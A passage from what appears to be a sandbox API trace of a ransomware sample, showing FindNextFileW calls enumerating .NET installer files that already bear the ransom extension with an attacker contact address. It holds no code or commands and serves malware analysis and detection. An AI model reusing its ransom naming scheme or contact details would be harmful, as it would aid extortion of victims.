ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1040", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1041", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1042", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1043", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1044", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1045", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1046", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1049", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1053", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1055", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="2052", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="2070", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="3076", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="3082", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Client", cAlternateFileName="")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dde06a3, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7dde06a3, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7e27b96b, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4002, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="DHtmlHeader.html.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DHTMLH~1.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e22f2bf, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7e22f2bf, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7e255589, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x15ad2, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="DisplayIcon.ico.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DISPLA~1.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Extended", cAlternateFileName="")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Graphics", cAlternateFileName="")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e84b37a, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7e84b37a, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7e84b37a, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf22, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="header.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="HEADER~1.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x80c34c35, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xadd395d, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="netfx_Core.mzz.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NETFX_~1.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x7f2b98b0, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x290312, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="netfx_Core_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NETFX_~2.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f2b98b0, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7f2b98b0, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7f99469c, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x11c112, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="netfx_Core_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NETFX_~3.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x822da238, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x29e23d9, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="netfx_Extended.mzz.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NETFX_~4.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c34c35, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x80c34c35, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x810c7e7b, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xd5112, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="netfx_Extended_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NEDD84~1.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x810edfa9, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x810edfa9, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x8158cadf, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x79112, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="netfx_Extended_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NE819E~1.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x815b2c14, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x815b2c14, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x81b5760d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x427b2, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="ParameterInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARAME~1.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81b5760d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x81b5760d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x81b7dab2, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2d312, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="RGB9RAST_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="RGB9RA~1.ACT")) returned 1 [0135.261] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81b7dab2, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x81b7dab2, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82042819, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x17312, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="RGB9Rast_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="RGB9RA~2.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82068cae, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82068cae, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82068cae, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x13242, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Setup.exe.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPE~1.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82068cae, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82068cae, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82e93039, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xc5252, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="SetupEngine.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPE~2.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b54206, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82b54206, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82b7347c, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x48252, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="SetupUi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPU~1.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b7347c, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82b7347c, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82b97d6a, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x76a2, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="SetupUi.xsd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPU~2.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b97d6a, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82b97d6a, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82b97d6a, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x17862, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="SetupUtility.exe.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPU~3.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b97d6a, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82b97d6a, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82edf372, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xa182, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="SplashScreen.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SPLASH~1.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e93039, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82e93039, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82eb8f34, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x23522, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="sqmapi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SQMAPI~1.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82eb8f34, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82eb8f34, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82eb8f34, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x3802, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Strings.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="STRING~1.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82eb8f34, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82eb8f34, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82edf372, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x98f2, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="UiInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="UIINFO~1.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82edf372, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82edf372, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82edf372, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x19782, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="watermark.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WATERM~1.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x83c22088, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x5b5245, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Windows6.0-KB956250-v6001-x64.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~2.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x835fd159, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7652, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Windows6.0-KB956250-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~1.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x84a9642b, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x59b300, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Windows6.1-KB958488-v6001-x64.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~3.ACT")) returned 1 [0135.262] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x843aaeaf, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2cae2b, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Windows6.1-KB958488-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~4.ACT")) returned 1 [0135.263] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x843aaeaf, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2cae2b, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Windows6.1-KB958488-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="WINDOW~4.ACT")) returned 0 [0135.263] FindClose (in: hFindFile=0x13272d8 | out: hFindFile=0x13272d8) returned 1 [0135.263] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4371898 | out: hHeap=0x2cb0000) returned 1 [0135.264] FindNextFileW (in: 